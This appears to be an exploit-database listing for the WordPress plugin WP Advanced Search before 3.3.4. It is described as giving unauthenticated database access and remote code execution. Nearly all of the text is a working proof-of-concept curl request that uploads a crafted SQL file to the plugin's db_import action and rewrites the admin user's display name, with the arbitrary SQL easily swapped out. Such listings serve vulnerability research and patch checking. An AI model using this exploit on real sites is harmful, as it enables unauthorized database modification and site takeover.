Exploit for WP Advanced Search < 3.3.4 - Unauthenticated Database Access and Remote Code Execution (RCE)

Name: Exploit for WP Advanced Search < 3.3.4 - Unauthenticated Database Access and Remote Code Execution (RCE)
Rating: 5 (154 reviews)

2020-03-05 | CVSS 2.0

## https://sploitus.com/exploit?id=WPEX-ID:F0573253-9DD4-4C73-AA2E-867C9CAAE0DC
# PoC: Update the admin's display name
curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1:8000' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------484865952156175792666168121' -H $'Content-Length: 302' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    --data-binary $'-----------------------------484865952156175792666168121\x0d\x0aContent-Disposition: form-data; name=\"wp_advanced_search_file_import\"; filename=\"test.sql\"\x0d\x0aContent-Type: application/sql\x0d\x0a\x0d\x0aupdate wp_users set display_name=\"Frycos\" where id = 1;\x0a\x0d\x0a-----------------------------484865952156175792666168121--\x0d\x0a' \
    $'http://127.0.0.1:8000/wp-admin/admin-post.php?action=db_import'